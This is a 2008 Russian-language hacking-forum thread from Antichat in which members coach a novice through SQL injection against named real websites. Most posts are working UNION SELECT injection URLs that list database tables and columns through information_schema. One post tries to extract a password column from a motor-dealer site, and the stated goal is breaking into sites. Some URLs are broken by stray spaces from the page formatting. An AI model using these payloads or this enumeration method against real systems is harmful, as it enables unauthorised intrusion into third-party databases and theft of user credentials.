Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.07.2008, 13:39
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
slider слух у мну вопрос!Как ты вычислил ентот managerpassword и managerlogin ??? Методом тыка или как? Просто вот такой вот ссылкочкой например www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,column_schema)+from+informatio n_schema.columns+limit+1,1/*
Мне ошибку пишет!!! Обьясни плиз я в этом деле новичек ((
|
|
|
11.07.2008, 13:47
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 BanQui
А что это у тебя за столбец column_schema?
Может нужно так ? 
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+1,1/*
Ошибки нету |
|
|
|
11.07.2008, 14:02
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
СПс терь другой вопрос смари http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+1,1/* - Ошибки нет
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+2,1/* - Ошибки нет
И так до 4 а вот тут
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+5,1/* - Ошибка есть и дальше они тоже присутствуют!
|
|
|
|
11.07.2008, 14:06
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
мдауж, откуда ты взял этот table_schema ??? table_name!
|
|
|
|
11.07.2008, 14:15
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Omg!Приношу свой извенения за свой тупизм)))))Спасибо!!! Вазьму на заметку ИМХО много раз отступал от взлома сайтоф именно по этому((
|
|
|
|
11.07.2008, 14:18
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
статьи для кого пишут?  почитай чтобы в следующий раз "не отступать от взлома" )) |
|
|
|
11.07.2008, 14:31
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Кстати вот тут еще одну фигню нашел токо что то не получаетцо никак информатион схемку вывести! Версия 4.0.24_Debian-10sarge2-log
Вот как пытался и пытаюсь чтото менять но пока не выходит ((( http://www.audit.by/new/index.php?id=10&spr=-999999+union+select+1,2,table_name+from+informatio n_schema.tables+limit+1,1/*
|
|
|
|
11.07.2008, 14:33
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
см. мой совет выше ^-^
в 4.0.24 нет information_schema...
вапросы по уязвимостям тут, а то щас и тебе и мне минусов наставят... |
|
|
|
11.07.2008, 15:33
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Ну и накурили тут вы =)
BanQui information_table есть только в пятой ветке скуля....
|
|
|
|
11.07.2008, 15:33
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Нашел вот енто
http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,concat(column_name,0x3 a,table_schema)%20FROM%20INFORMATION_SCHEMA.column s+limit+559,1/*
Попыталсо сделать вот так:
http://www.adams-motors.ru/new.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(0x 3a,user_newpasswd),0x71),0x71)%20FROM%20adamsold/*
Нече не выходит!!!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
